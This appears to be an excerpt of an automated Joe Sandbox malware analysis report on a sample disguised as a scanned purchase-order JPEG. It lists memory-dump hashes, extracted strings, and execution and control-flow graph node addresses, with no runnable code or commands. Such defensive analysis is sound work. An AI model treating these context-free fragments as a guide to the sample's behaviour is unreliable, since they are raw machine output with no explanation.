                                                                                                        • Opcode Fuzzy Hash: 338d2fc68f7836c3e2fd8b76c397ed103aa7cccb21acdef631250f60170a07f0
                                                                                                        • Instruction Fuzzy Hash: 3BF08231340A5087CB29673D901E63E72ABAFC6930B14402DE50ACB392CF25CC46E795
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1735603830.0000000005730000.00000040.00000800.00020000.00000000.sdmp, Offset: 05730000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_5730000_Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: c01310d94d59dbb5f0fc54326b4bb99d59c7c232521fbc416a14766b937c8781
                                                                                                        • Instruction ID: b11ee94b5e5181a94f6a98170ceb3e1ff422b66fd25555b19487429b305da98e
                                                                                                        • Opcode Fuzzy Hash: c01310d94d59dbb5f0fc54326b4bb99d59c7c232521fbc416a14766b937c8781
                                                                                                        • Instruction Fuzzy Hash: B7F0B4713006209FC7249B1AE444A5AF7BAFFC8624B10426EE40687365DB71EC41C790
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1735603830.0000000005730000.00000040.00000800.00020000.00000000.sdmp, Offset: 05730000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_5730000_Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: e26b3b693c3fa3a092213b46d9974f97095fdf38ae2968b16eb170a88f8efb51
                                                                                                        • Instruction ID: 4243ceffdd30f352615e2fe6667d750750fc4abca0ae9b7f9b7c733986b7bd1f
                                                                                                        • Opcode Fuzzy Hash: e26b3b693c3fa3a092213b46d9974f97095fdf38ae2968b16eb170a88f8efb51
                                                                                                        • Instruction Fuzzy Hash: 0601B675D00609DFCB40EFACC54589DBBF4FF49210B1185AAE859EB321E770AA44CF91
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1735603830.0000000005730000.00000040.00000800.00020000.00000000.sdmp, Offset: 05730000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_5730000_Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 58f52687aa050cf5efaadf725eb626fafd76ad26a58e59991b37d4576eeb68de
                                                                                                        • Instruction ID: 47b0072f1afaccd1623a2b91c6610d3b2142962d3771438017fb15b5cf28511e
                                                                                                        • Opcode Fuzzy Hash: 58f52687aa050cf5efaadf725eb626fafd76ad26a58e59991b37d4576eeb68de
                                                                                                        • Instruction Fuzzy Hash: 65F0E2B5900218CFDB20DF99D449B9EFBF0AB98324F24C41AD599A7361C378A544CFA1
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1735603830.0000000005730000.00000040.00000800.00020000.00000000.sdmp, Offset: 05730000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_5730000_Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 9e594acaf7ca3c017a78984df0169a54c52bfc9c893e541d20b0caef5438ce27
                                                                                                        • Instruction ID: 67279800a8039f37f5c19f0fd77a3c0a16c7027f01172595c2a318f050ca6094
                                                                                                        • Opcode Fuzzy Hash: 9e594acaf7ca3c017a78984df0169a54c52bfc9c893e541d20b0caef5438ce27
                                                                                                        • Instruction Fuzzy Hash: CEE0E5712047045FC730DA25CC0AD6777ADEF44664700486DE88987652E631E805D690
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1735603830.0000000005730000.00000040.00000800.00020000.00000000.sdmp, Offset: 05730000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_5730000_Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: e7560a0daa7be73d65cab2b0860bff90bf182d5720c1b6e06b8dc6bb62326f2f
                                                                                                        • Instruction ID: e5ab57c6b4843ea492ba06b6ff2033cda6302608e8dedd8a6ecbc8ab6e88b311
                                                                                                        • Opcode Fuzzy Hash: e7560a0daa7be73d65cab2b0860bff90bf182d5720c1b6e06b8dc6bb62326f2f
                                                                                                        • Instruction Fuzzy Hash: C5F0DF30240610CFC718DB2CD588C59BBEAFF4AB1971185A9E51ACB372CBB2EC40CB80
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1735603830.0000000005730000.00000040.00000800.00020000.00000000.sdmp, Offset: 05730000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_5730000_Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: cd9aaa1c65b3703b9785dc9632217ceadd96ec6d9e9be544301ec3287a465031
                                                                                                        • Instruction ID: a31a3df556074e61b9e2d7246e87514e6b131645dd9d0e2f07cdd9f559932da0
                                                                                                        • Opcode Fuzzy Hash: cd9aaa1c65b3703b9785dc9632217ceadd96ec6d9e9be544301ec3287a465031
                                                                                                        • Instruction Fuzzy Hash: A7E0D83214415D6FCB02DF59D901ADA7F9DEF4D310F008491FA54C6122C33AD966A7E5
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1735603830.0000000005730000.00000040.00000800.00020000.00000000.sdmp, Offset: 05730000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_5730000_Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 19580ff4a23fa9dc17a4e0761cef0e1774d4ea06817f46d2c228ba311835e1cf
                                                                                                        • Instruction ID: 85047c81af25f8b2336e63c622b3fa30903aca27062f71993baf90b3c419fddd
                                                                                                        • Opcode Fuzzy Hash: 19580ff4a23fa9dc17a4e0761cef0e1774d4ea06817f46d2c228ba311835e1cf
                                                                                                        • Instruction Fuzzy Hash: 79E0CD313546145FC728DB5DD48086BF3EAEF8C3117118979F10AC7365DE60FC084644
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1735603830.0000000005730000.00000040.00000800.00020000.00000000.sdmp, Offset: 05730000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_5730000_Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 67ad4ba8ff3bd3504bcb7008e83fa8c3ad11d63d15fad5f756ab17875d04bcdd
                                                                                                        • Instruction ID: 8baf6ec09019851d53312b9884518564df24e1a84169dca5bb7a89989cbb29b1
                                                                                                        • Opcode Fuzzy Hash: 67ad4ba8ff3bd3504bcb7008e83fa8c3ad11d63d15fad5f756ab17875d04bcdd
                                                                                                        • Instruction Fuzzy Hash: E6E086353545108FC759CE5CD8417A5B7E1DB88310B158569E049CB7A5CA60EC0A4740
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1735603830.0000000005730000.00000040.00000800.00020000.00000000.sdmp, Offset: 05730000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_5730000_Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 438de1b2423d0db34da19905ed93e6fc7787cda23fb842cbc845a923730b1f01
                                                                                                        • Instruction ID: e88e31864fca7c3844c17b5920d233729c4b6495365aa9db6476e0910f883b98
                                                                                                        • Opcode Fuzzy Hash: 438de1b2423d0db34da19905ed93e6fc7787cda23fb842cbc845a923730b1f01
                                                                                                        • Instruction Fuzzy Hash: 2ED0A7323100301BC2A0945C7C587AE21AAC7C92A0B54003EFD02D7380DD909E0623D8
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1735603830.0000000005730000.00000040.00000800.00020000.00000000.sdmp, Offset: 05730000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_5730000_Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 67953f9b2db748affb3cd3868e5f2dea995b6ace08411daeff57a498ca06cb9f
                                                                                                        • Instruction ID: 8852a79040f66bf972c2d3a2e8759c2cb20968e8e0d33fcfb39262b18856ffe7
                                                                                                        • Opcode Fuzzy Hash: 67953f9b2db748affb3cd3868e5f2dea995b6ace08411daeff57a498ca06cb9f
                                                                                                        • Instruction Fuzzy Hash: A7D0A7B50954465BD3460260AE5B3B52E65E3013D5F080079D89585143D511C0067746
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1735603830.0000000005730000.00000040.00000800.00020000.00000000.sdmp, Offset: 05730000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_5730000_Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: a8558e102da5d3ff87ac18fefedf237f9eb3b93a48ef2f46e4504e6cb67add23
                                                                                                        • Instruction ID: 5380fdd250a5b9ff8beac9d953f770d9f86c541d2e60703719f7abed58912c82
                                                                                                        • Opcode Fuzzy Hash: a8558e102da5d3ff87ac18fefedf237f9eb3b93a48ef2f46e4504e6cb67add23
                                                                                                        • Instruction Fuzzy Hash: FDD012702A520B87DB5856A5B456B76379DAF40725F080069FC0FC5506EBA3E841AA12
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1741023330.000000000C1C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0C1C0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_c1c0000_Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 5413a3628a51aeb7a28f56165602fb431afa0431b8d0b58a23e7ffcddaac1294
                                                                                                        • Instruction ID: 65298ead14e305204bcbc1086b92ffe2069369d6a6c1cd1736721740abbad818
                                                                                                        • Opcode Fuzzy Hash: 5413a3628a51aeb7a28f56165602fb431afa0431b8d0b58a23e7ffcddaac1294
                                                                                                        • Instruction Fuzzy Hash: 7F22F674F012198FCB14CF99C5C4AAEBBF2EF58304F248169E415AB356D735A982CFA1
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1735562879.0000000005680000.00000040.00000800.00020000.00000000.sdmp, Offset: 05680000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_5680000_Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 834edb8e8dae5e18c91640b9a3e457a8464a4c390992845a8be3c2c30f3bf44e
                                                                                                        • Instruction ID: 014181f547d18d949ed9e05113fc7a8a3ecdc75c097e3a796fd488f3275bc449
                                                                                                        • Opcode Fuzzy Hash: 834edb8e8dae5e18c91640b9a3e457a8464a4c390992845a8be3c2c30f3bf44e
                                                                                                        • Instruction Fuzzy Hash: DF126FB04017468AE730CF65F94C2897BB1BB85328B948709D2A56F6F9DBB8158BCF44
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1741023330.000000000C1C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0C1C0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c1c0000_Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: b63e8861ec3f529d7d57b15c100d592dbd5d1cd0fff5e987541311d09ad16c01
• Instruction ID: f5c4079c1ac9f98c5ef4e0b36a40e5dc2aacfbe3315c0d58ae906c5af19b1264
• Opcode Fuzzy Hash: b63e8861ec3f529d7d57b15c100d592dbd5d1cd0fff5e987541311d09ad16c01
• Instruction Fuzzy Hash: 40E11474E051198FCB14DFA9D5909AEBBB2FF88304F24C169E415AB316DB34A981CFA0
Memory Dump Source
• Source File: 00000000.00000002.1741023330.000000000C1C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0C1C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c1c0000_Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: e53472d269a6c510d2e6e88cbc988335591914d4be49ebf1e711326095c985c3
• Instruction ID: c450e1f0666d2634104714e09b01828f361f1bf8c81dd77a563ba90d99c5c048
• Opcode Fuzzy Hash: e53472d269a6c510d2e6e88cbc988335591914d4be49ebf1e711326095c985c3
• Instruction Fuzzy Hash: E5E10574E051198FCB14DFA9D590AAEFBB2FF88304F24C169E415AB356D730A981CFA4
Memory Dump Source
• Source File: 00000000.00000002.1741023330.000000000C1C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0C1C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c1c0000_Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 50d58e6ad48977ae9245a1e6d29937ead2387e9c30925d759321582d86d307dd
• Instruction ID: 35df7293e17f0473732aac4c328629186c3b716aad91bccf43f64973919f17cf
• Opcode Fuzzy Hash: 50d58e6ad48977ae9245a1e6d29937ead2387e9c30925d759321582d86d307dd
• Instruction Fuzzy Hash: 55E11574E012198FCB14DFA9C5809AEBBF2FF88304F248169E415AB316D734A981DFA0
Memory Dump Source
• Source File: 00000000.00000002.1735562879.0000000005680000.00000040.00000800.00020000.00000000.sdmp, Offset: 05680000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_5680000_Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: c8775c15bb1242488c3a4f3acce23a4bd68f24a9d33d6d3e75e897e47ac54b4f
• Instruction ID: 1488b338a546d7cf5796226db4d26d3c0adc7f8b8a976673729abb576e2f774b
• Opcode Fuzzy Hash: c8775c15bb1242488c3a4f3acce23a4bd68f24a9d33d6d3e75e897e47ac54b4f
• Instruction Fuzzy Hash: 8CA17136E002058FCF15EFB5C8545AEB7B2FF84310B15866AE816AB325DB71E955CF80
Memory Dump Source
• Source File: 00000000.00000002.1735562879.0000000005680000.00000040.00000800.00020000.00000000.sdmp, Offset: 05680000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_5680000_Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: ccdff909f48e45d4b5d3e3555e592baa1a840c1b8f470e1f90dec3b989e12f2d
• Instruction ID: 19d716d153917912b49bef5628789325e8bf6558a41098d525fcd2dc370c3eed
• Opcode Fuzzy Hash: ccdff909f48e45d4b5d3e3555e592baa1a840c1b8f470e1f90dec3b989e12f2d
• Instruction Fuzzy Hash: 70C1E4B09007468BE720CF69E84C1897BB1FB85328F648709D1616F2F9DBB8558BCF84
Memory Dump Source
• Source File: 00000000.00000002.1735562879.0000000005680000.00000040.00000800.00020000.00000000.sdmp, Offset: 05680000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_5680000_Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 4bc5782a9c275ceb40c79de548acb58179ee5e362fff415cc1bdd1ac490e56cf
• Instruction ID: a8cf846720106dbdbcc27a889a5eef5dfcfcef1a842cf5b990412a44d234d9aa
• Opcode Fuzzy Hash: 4bc5782a9c275ceb40c79de548acb58179ee5e362fff415cc1bdd1ac490e56cf
• Instruction Fuzzy Hash: 97C1D5B18117468BE720CF69E84C2897BB1FB85328F658319D1616F2F9DBB8158BCF44
Memory Dump Source
• Source File: 00000000.00000002.1741023330.000000000C1C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0C1C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c1c0000_Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 5e25979edc01e6edd61622334797243e661174196d9712c8588f2ae9115906da
• Instruction ID: 1a897575307fa3fc6690daffe3f5ad7bf913d5f625a7eb5210ba514e4bab8581
• Opcode Fuzzy Hash: 5e25979edc01e6edd61622334797243e661174196d9712c8588f2ae9115906da
• Instruction Fuzzy Hash: 8951F674E052198FDB14CFAAD5805AEBBF2AF89304F24C169E418AB316D734A941CFA1
Memory Dump Source
• Source File: 00000000.00000002.1741023330.000000000C1C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0C1C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c1c0000_Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: e3cecfbc7ef7150f01128815d8984192af1a019081d298f24a2ceac101621afb
• Instruction ID: 6d2c635cdb31ec44b45f0c92f8e8a8067768160f0a5c4c00ec152fa428d23f1c
• Opcode Fuzzy Hash: e3cecfbc7ef7150f01128815d8984192af1a019081d298f24a2ceac101621afb
• Instruction Fuzzy Hash: 4C51FB70E012198FCB14DFA9D5845AEFBF2FF89304F24C169E419A7216D734A941CFA1
Memory Dump Source
• Source File: 00000000.00000002.1741023330.000000000C1C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0C1C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c1c0000_Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 9bbfdfdda0fc3d8cba7dba9d50dd2105e9c6d850d4247802a608ced722864e37
• Instruction ID: b8e22a5ff88793e51eae76e56f38dde6c32b567b5555a497aedb77a44732a15a
• Opcode Fuzzy Hash: 9bbfdfdda0fc3d8cba7dba9d50dd2105e9c6d850d4247802a608ced722864e37
• Instruction Fuzzy Hash: 4D51D674E012198FDB14CFAAD5805AEBBF2AF89304F24C169E418A7316D735A941CFA1
Strings
Memory Dump Source
• Source File: 00000000.00000002.1735603830.0000000005730000.00000040.00000800.00020000.00000000.sdmp, Offset: 05730000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_5730000_Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.jbxd
Similarity
• API ID:
• String ID: 4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q
• API String ID: 0-2697097662
• Opcode ID: 5b1c5e09f713171a393af86cb18c3c3707e887f346c8b2a341c49ffba359c974
• Instruction ID: ae0bcbe709b49834facee504a237f6a1212ed0d058d81558e4ab85d5dfb56503
• Opcode Fuzzy Hash: 5b1c5e09f713171a393af86cb18c3c3707e887f346c8b2a341c49ffba359c974
• Instruction Fuzzy Hash: 78123F70E0121A9FCB18EF75E89169DB7B2FF40304F5085A9D009AB269EF346D89CF91
Strings
Memory Dump Source
• Source File: 00000000.00000002.1735603830.0000000005730000.00000040.00000800.00020000.00000000.sdmp, Offset: 05730000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_5730000_Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.jbxd
Similarity
• API ID:
• String ID: 4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q
• API String ID: 0-2697097662
• Opcode ID: 3ce96b5fcb726b5adc52df689bde18aa0f1db479569456e816197589ead0a951
• Instruction ID: cbc033e6430d74e63db3cb082f157aed17376aeb5c7a5a886933d5ab47e14560
• Opcode Fuzzy Hash: 3ce96b5fcb726b5adc52df689bde18aa0f1db479569456e816197589ead0a951
• Instruction Fuzzy Hash: 3E123F70A0121A9FCB18EF75E99169DB7B2FF40304F5085A9D009AB279EF346D89CF91

Execution Graph

Execution Coverage: 17.3%
Dynamic/Decrypted Code Coverage: 100%
Signature Coverage: 14.9%
Total number of Nodes: 47
Total number of Limit Nodes: 13
execution_graph 19589 6919c18 19590 6919c1f 19589->19590 19592 6919c25 19589->19592 19590->19592 19594 6919fa6 19590->19594 19595 6919328 19590->19595 19593 6919328 2 API calls 19593->19594 19594->19592 19594->19593 19596 691933a 19595->19596 19597 691933f 19595->19597 19596->19594 19597->19596 19598 691957e LdrInitializeThunk 19597->19598 19601 6919619 19598->19601 19599 69196d9 19599->19594 19600 6919a69 LdrInitializeThunk 19600->19599 19601->19599 19601->19600 19602 122e018 19607 122e024 19602->19607 19604 122e61f 19609 6912968 19607->19609 19610 691298a 19609->19610 19611 122e0c3 19610->19611 19614 6919328 2 API calls 19610->19614 19624 6919548 19610->19624 19632 691992c 19610->19632 19638 6919318 19610->19638 19616 691fc68 19611->19616 19620 691fc5e 19611->19620 19614->19611 19617 691fc8a 19616->19617 19618 6919548 4 API calls 19617->19618 19619 691fd3a 19617->19619 19618->19619 19619->19604 19621 691fc8a 19620->19621 19622 6919548 4 API calls 19621->19622 19623 691fd3a 19621->19623 19622->19623 19623->19604 19625 6919579 19624->19625 19626 691957e LdrInitializeThunk 19624->19626 19625->19626 19630 6919619 19626->19630 19627 69196d9 19627->19611 19628 6919924 LdrInitializeThunk 19628->19627 19630->19627 19630->19628 19631 6919328 2 API calls 19630->19631 19631->19630 19636 69197e3 19632->19636 19633 6919924 LdrInitializeThunk 19635 6919a81 19633->19635 19635->19611 19636->19633 19637 6919328 2 API calls 19636->19637 19637->19636 19639 691933a 19638->19639 19640 691933f 19638->19640 19639->19611 19640->19639 19641 691957e LdrInitializeThunk 19640->19641 19643 6919619 19641->19643 19642 69196d9 19642->19611 19643->19642 19644 6919924 LdrInitializeThunk 19643->19644 19646 6919328 2 API calls 19643->19646 19644->19642 19646->19643

Control-flow Graph

• Executed
• Not Executed
control_flow_graph 146 1227118-122713b 147 1227146-1227166 146->147 148 122713d-1227143 146->148 151 1227168 147->151 152 122716d-1227174 147->152 148->147 153 12274fc-1227505 151->153 154 1227176-1227181 152->154 155 1227187-122719a 154->155 156 122750d-1227519 154->156 159 12271b0-12271cb 155->159 160 122719c-12271aa 155->160 161 122751b-1227521 156->161 162 122753d 156->162 169 12271ef-12271f2 159->169 170 12271cd-12271d3 159->170 160->159 172 1227484-122748b 160->172 163 1227523-122753b 161->163 164 1227545-1227549 161->164 162->164 163->162 166 1227552-122755b 164->166 167 122754b-1227550 164->167 171 122755c-1227585 166->171 167->171 177 12271f8-12271fb 169->177 178 122734c-1227352 169->178 173 12271d5 170->173 174 12271dc-12271df 170->174 191 1227587-1227589 171->191 192 122758b-122759a 171->192 172->153 175 122748d-122748f 172->175 173->174 173->178 179 1227212-1227218 173->179 180 122743e-1227441 173->180 174->179 181 12271e1-12271e4 174->181 182 1227491-1227496 175->182 183 122749e-12274a4 175->183 177->178 185 1227201-1227207 177->185 178->180 184 1227358-122735d 178->184 193 122721a-122721c 179->193 194 122721e-1227220 179->194 195 1227447-122744d 180->195 196 1227508 180->196 187 12271ea 181->187 188 122727e-1227284 181->188 182->183 183->156 189 12274a6-12274ab 183->189 184->180 185->178 190 122720d 185->190 187->180 188->180 200 122728a-1227290 188->200 197 12274f0-12274f3 189->197 198 12274ad-12274b2 189->198 190->180 199 12275e9-12275eb 191->199 215 12275e4 192->215 216 122759c-12275ab 192->216 201 122722a-1227233 193->201 194->201 202 1227472-1227476 195->202 203 122744f-1227457 195->203 196->156 197->196 205 12274f5-12274fa 197->205 198->196 206 12274b4 198->206 207 1227292-1227294 200->207 208 1227296-1227298 200->208 211 1227246-122726e 201->211 212 1227235-1227240 201->212 202->172 204 1227478-122747e 202->204 203->156 210 122745d-122746c 203->210 204->154 204->172 205->153 205->175 213 12274bb-12274c0 206->213 214 12272a2-12272b9 207->214 208->214 210->159 210->202 240 1227362-1227398 211->240 241 1227274-1227279 211->241 212->180 212->211 219 12274e2-12274e4 213->219 220 12274c2-12274c4 213->220 229 12272e4-122730b 214->229 230 12272bb-12272d4 214->230 215->199 216->215 228 12275ad-12275b3 216->228 219->196 223 12274e6-12274e9 219->223 224 12274d3-12274d9 220->224 225 12274c6-12274cb 220->225 223->197 224->156 227 12274db-12274e0 224->227 225->224 227->219 232 12274b6-12274b9 227->232 233 12275b7-12275c3 228->233 234 12275b5 228->234 229->196 247 1227311-1227314 229->247 230->240 245 12272da-12272df 230->245 232->196 232->213 235 12275c5-12275de 233->235 234->235 235->215 252 12275e0-12275e2 235->252 249 12273a5-12273ad 240->249 250 122739a-122739e 240->250 241->240 245->240 247->196 251 122731a-1227343 247->251 249->196 255 12273b3-12273b8 249->255 253 12273a0-12273a3 250->253 254 12273bd-12273c1 250->254 251->240 267 1227345-122734a 251->267 252->199 253->249 253->254 256 12273c3-12273c9 254->256 257 12273e0-12273e4 254->257 255->180 256->257 259 12273cb-12273d3 256->259 260 12273e6-12273ec 257->260 261 12273ee-122740d call 12276f1 257->261 259->196 262 12273d9-12273de 259->262 260->261 264 1227413-1227417 260->264 261->264 262->180 264->180 265 1227419-1227435 264->265 265->180 267->240
Strings
Memory Dump Source
• Source File: 00000006.00000002.4131286835.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_1220000_Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.jbxd
Similarity
• API ID:
• String ID: (o^q$(o^q$(o^q$,bq$,bq
• API String ID: 0-2525668591
• Opcode ID: fed15881c87bf22ae4f4e0655a822b725b9b24ad12e689409ed94f5e6787049d
• Instruction ID: c5d9d004dd1ee40dc0dd3c1e45af878e7566346be764e53b850bfa677fb07afa
• Opcode Fuzzy Hash: fed15881c87bf22ae4f4e0655a822b725b9b24ad12e689409ed94f5e6787049d
• Instruction Fuzzy Hash: 78F15B30A24229EFDB15CFA9D885AADBFB6FF59310F258069E905AB261D730D841CB50

Control-flow Graph

• Executed
• Not Executed
control_flow_graph 379 122c146-122c158 380 122c184 379->380 381 122c15a-122c172 379->381 382 122c186-122c18a 380->382 385 122c174-122c179 381->385 386 122c17b-122c17e 381->386 385->382 387 122c180-122c182 386->387 388 122c18b-122c199 386->388 387->380 387->381 390 122c1c0-122c1c1 388->390 391 122c19b-122c1a1 388->391 393 122c1c8 390->393 392 122c1a3-122c1bf 391->392 391->393 392->390 394 122c1ca 393->394 395 122c1cf-122c2ac call 12241a0 call 1223cc0 393->395 394->395 405 122c2b3-122c2d4 call 1225658 395->405 406 122c2ae 395->406 408 122c2d9-122c2e4 405->408 406->405 409 122c2e6 408->409 410 122c2eb-122c2ef 408->410 409->410 411 122c2f1-122c2f2 410->411 412 122c2f4-122c2fb 410->412 413 122c313-122c357 411->413 414 122c302-122c310 412->414 415 122c2fd 412->415 419 122c3bd-122c3d4 413->419 414->413 415->414 421 122c3d6-122c3fb 419->421 422 122c359-122c36f 419->422 431 122c413 421->431 432 122c3fd-122c412 421->432 426 122c371-122c37d 422->426 427 122c399 422->427 428 122c387-122c38d 426->428 429 122c37f-122c385 426->429 430 122c39f-122c3bc 427->430 433 122c397 428->433 429->433 430->419 432->431 433->430
Strings
Memory Dump Source
• Source File: 00000006.00000002.4131286835.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_1220000_Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.jbxd
Similarity
• API ID:
• String ID: 0oAp$LjAp$LjAp$PH^q$PH^q
• API String ID: 0-1487592376
